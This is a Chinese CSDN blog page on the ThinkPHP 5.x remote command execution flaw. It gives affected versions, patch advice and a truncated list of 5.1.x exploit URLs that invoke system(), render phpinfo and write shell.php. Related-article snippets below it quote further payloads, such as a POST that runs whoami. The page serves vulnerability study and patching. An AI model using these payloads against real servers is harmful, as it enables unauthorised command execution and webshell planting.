Thinkphp 5.x远程命令执行漏洞

最新推荐文章于 2024-08-15 09:11:40 发布
最新推荐文章于 2024-08-15 09:11:40 发布
阅读量1.6k 收藏 5
点赞数
分类专栏: web渗透测试 文章标签: php thinkphp 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51803069/article/details/109542374
版权
本文详细介绍了ThinkPHP 5.x版本的一个远程命令执行漏洞,该漏洞可能导致getshell。官方已在2018年12月9日发布安全更新,建议用户立即更新到最新版本以修复。文章提供了不同版本的漏洞触发payload,并演示了本地复现漏洞的步骤,同时给出了官方提供的修复补丁链接。
摘要由CSDN通过智能技术生成

漏洞描述

ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。
thinkphp5最出名的就是rce,rce有两个大版本的分别:
ThinkPHP 5.0-5.0.24
ThinkPHP 5.1.0-5.1.30
因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的。
5.1.x :

?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_use
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行漏洞复现
weixin_34566429的博客
12-23 552
一、漏洞描述2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。二、漏洞影响版本Thinkphp 5.x-Thinkphp 5.1.31Thinkphp 5.0.x<=5.0.23三、漏洞复...
THINKPHP5.X远程命令执行漏洞
qq_40461312的博客
10-09 1608
前言 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。 一、漏洞影响范围 5.x < 5.1.31, <= 5.0.23 二、如何确认THINKPHP版本 多数情况下直接引发报错页面即可获取到thinkphp版本信息,也可以.
ThinkPHP5.x-远程命令执行漏洞
LYJ20010728的博客
06-06 744
ThinkPHP 5.x远程命令执行漏洞漏洞原因漏洞影响版本漏洞复现搭建漏洞环境POC1POC2&POC3POC4&POC5 漏洞原因 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行 漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 漏洞复现 搭建漏洞环境 官网下载Thinkphp 5.0.22,下载地址 使用phpstudy搭建环境,解压下载的Thin
ThinkPHP远程代码执行漏洞分析及防御指南
最新发布
gitblog_00643的博客
08-15 951
ThinkPHP远程代码执行漏洞分析及防御指南 ThinkphpRCE项目地址:https://gitcode.com/gh_mirrors/th/ThinkphpRCE 一、项目介绍 1.1 概述 ThinkPHP是一款流行的PHP开发框架,以其简洁高效的特性深受开发者喜爱。然而,在一些版本中发现的安全漏洞威胁到了基于该框架构建的Web应用程序的安全性。其中,“thinkphp-RCE-POC...
漏洞预警 | ThinkPHP 5.x远程命令执行漏洞
a970241850的博客
12-13 232
ThinkPHP采用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,是一款兼容性高、部署简单的轻量级国产PHP开发框架。 近日,ThinkPHP团队发布了版本更新信息,修复一个远程代码执行漏洞。该漏洞是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可远程执行代码。攻击者利用该漏洞,...
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 2049
thinkPHP5漏洞复现
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
qq_50854662的博客
10-23 1457
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5.2.x 这几个版本,都无需登入可以进行远程代码执行漏洞版本: 5.0.x5.1.x5.2.x 漏洞搭建
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
weixin_34314962的博客
12-11 4112
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run the project 然后访问给出的target address执行系统命令显示目录下文件http://aaa.vsplate.me:52763/public/index.php?s=/index...
ThinkPHP5 远程命令执行漏洞分析
weixin_30906671的博客
12-13 134
本文首发自安全脉搏,转载请注明出处。 前言 ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。 测试环境: ThinkPHP 5.1 beta+ win10 64bit + wamp 漏洞分析 网上已经有些分析文章了,我就...
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 6179
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
ThinkPHP5.0.x远程执行漏洞分析与复现
qq_74148743的博客
05-11 1327
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1725
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。
thinkphp5+远程代码执行_ThinkPHP5 远程代码执行漏洞高危
weixin_39889642的博客
11-25 107
安全预警漏洞ThinkPHP5远程代码执行漏洞等级:高危影响范围:thinkphp 5.x漏洞描述:框架中的Request类的存在设计缺陷导致远程代码执行漏洞,最终攻击者可利用该漏洞获取系统权限。修复方案:https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de0032019...
thinkphp5框架漏洞
m0_74196038的博客
03-07 1467
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的这个poc是通过post方法提交的,然后url当中还是要提交?s=captcha特殊url编码之后的POC。
漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1497
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
thinkphp 2.x 任意代码执行漏洞
06-28
这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值